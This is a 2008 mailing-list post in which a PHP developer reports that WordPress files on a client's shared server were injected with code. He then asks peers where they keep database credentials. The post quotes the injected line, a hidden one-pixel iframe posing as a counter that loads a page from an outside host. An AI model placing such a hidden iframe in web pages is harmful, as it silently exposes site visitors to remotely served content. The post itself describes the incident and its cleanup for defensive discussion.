[FX.php List] [OFF] Security
Jonathan Schwartz
jschwartz at exit445.com
Wed Apr 23 16:57:14 MDT 2008
Hi Folks,
Different Day, Different Challenge.
I had to deal with a client's issue today on a third party shared
server. It appears that a bot (?) got in and appended a line of code
to each php file in a WordPress directory:
<!--LiveInternet counter--><iframe
src="http://liveinternets.com/all/update.php" width=1 height=1
style="visibility:hidden;position:absolute"></iframe><!--/LiveInternet-->
No sure what it is supposed to do, but it managed to generate PHP
buffer errors and stop the site in its tracks. Thankfully, a
multi-file global find/replace was able to do away with the offending
code.
None of my code was affected.
Now that I've experienced my first attack, I'm focused on security.
I'm interested to know if folks store username and passwords in the
FX/server-data.php file. Or, relocate these "keys to the kingdom"
remotely? I have seen advise to keep the info out of the web server
folder altogether.
Any war stories?
J
--
Jonathan Schwartz
Exit 445 Group
jonathan at exit445.com
http://www.exit445.com
415-381-1852
More information about the FX.php_List
mailing list